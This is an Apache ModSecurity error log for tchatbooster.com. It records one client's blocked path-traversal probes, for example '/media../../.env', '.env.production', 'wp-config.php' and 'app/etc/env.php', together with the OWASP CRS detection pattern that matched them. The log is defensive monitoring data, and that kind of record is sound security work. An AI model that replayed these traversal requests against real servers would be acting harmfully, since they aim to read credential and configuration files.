[Tue May 12 04:40:02.805920 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTAs1tk6y7yBJLpJoqDAAAAIM"]
[Tue May 12 04:40:02.805995 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTAs1tk6y7yBJLpJoqDAAAAIM"]
[Tue May 12 04:40:02.806164 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKTAs1tk6y7yBJLpJoqDAAAAIM"]
[Tue May 12 04:40:03.237842 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTAs1tk6y7yBJLpJoqDAAAAIM"]
[Tue May 12 04:40:03.256180 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTAwgpmE1yW0glLdgffQAAANY"], referer: https://tchatbooster.com/media../../.env
[Tue May 12 04:40:03.256393 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTAwgpmE1yW0glLdgffQAAANY"], referer: https://tchatbooster.com/media../../.env
[Tue May 12 04:40:03.720171 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTAwgpmE1yW0glLdgffQAAANY"], referer: https://tchatbooster.com/media../../.env
[Tue May 12 04:40:03.746228 2026] [core:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 04:40:04.213260 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTBAgpmE1yW0glLdgffgAAANY"], referer: https://tchatbooster.com/media../../../.env
[Tue May 12 04:40:04.213483 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTBAgpmE1yW0glLdgffgAAANY"], referer: https://tchatbooster.com/media../../../.env
[Tue May 12 04:40:04.686654 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBAgpmE1yW0glLdgffgAAANY"], referer: https://tchatbooster.com/media../../../.env
[Tue May 12 04:40:04.773540 2026] [core:error] [pid 1825179:tid 1825214] [client 45.148.10.166:64496] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 04:40:05.246373 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTBQgpmE1yW0glLdgfgAAAANY"], referer: https://tchatbooster.com/media../../../../.env
[Tue May 12 04:40:05.246590 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTBQgpmE1yW0glLdgfgAAAANY"], referer: https://tchatbooster.com/media../../../../.env
[Tue May 12 04:40:05.759824 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBQgpmE1yW0glLdgfgAAAANY"], referer: https://tchatbooster.com/media../../../../.env
[Tue May 12 04:40:05.910123 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTBRfeipD4uoG21FoizQAAAA4"]
[Tue May 12 04:40:05.910211 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTBRfeipD4uoG21FoizQAAAA4"]
[Tue May 12 04:40:05.910380 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTBRfeipD4uoG21FoizQAAAA4"]
[Tue May 12 04:40:06.375652 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBRfeipD4uoG21FoizQAAAA4"]
[Tue May 12 04:40:06.394744 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTBggpmE1yW0glLdgfggAAANY"], referer: https://tchatbooster.com/media../../.env.local
[Tue May 12 04:40:06.395003 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTBggpmE1yW0glLdgfggAAANY"], referer: https://tchatbooster.com/media../../.env.local
[Tue May 12 04:40:06.870119 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBggpmE1yW0glLdgfggAAANY"], referer: https://tchatbooster.com/media../../.env.local
[Tue May 12 04:40:06.894964 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTBhfeipD4uoG21FoizgAAAA4"]
[Tue May 12 04:40:06.895065 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTBhfeipD4uoG21FoizgAAAA4"]
[Tue May 12 04:40:06.895276 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTBhfeipD4uoG21FoizgAAAA4"]
[Tue May 12 04:40:07.344714 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBhfeipD4uoG21FoizgAAAA4"]
[Tue May 12 04:40:07.365194 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTBwgpmE1yW0glLdgfhAAAANY"], referer: https://tchatbooster.com/media../../.env.production
[Tue May 12 04:40:07.365409 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTBwgpmE1yW0glLdgfhAAAANY"], referer: https://tchatbooster.com/media../../.env.production
[Tue May 12 04:40:07.837971 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBwgpmE1yW0glLdgfhAAAANY"], referer: https://tchatbooster.com/media../../.env.production
[Tue May 12 04:40:07.862145 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTBxfeipD4uoG21Foi0AAAAA4"]
[Tue May 12 04:40:07.862265 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTBxfeipD4uoG21Foi0AAAAA4"]
[Tue May 12 04:40:07.862448 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTBxfeipD4uoG21Foi0AAAAA4"]
[Tue May 12 04:40:08.307237 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTBxfeipD4uoG21Foi0AAAAA4"]
[Tue May 12 04:40:08.333338 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTCAgpmE1yW0glLdgfhQAAANY"], referer: https://tchatbooster.com/media../../wp-config.php
[Tue May 12 04:40:08.333553 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTCAgpmE1yW0glLdgfhQAAANY"], referer: https://tchatbooster.com/media../../wp-config.php
[Tue May 12 04:40:08.804263 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTCAgpmE1yW0glLdgfhQAAANY"], referer: https://tchatbooster.com/media../../wp-config.php
[Tue May 12 04:40:08.828259 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.166:64500] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTCBfeipD4uoG21Foi0gAAAA4"]
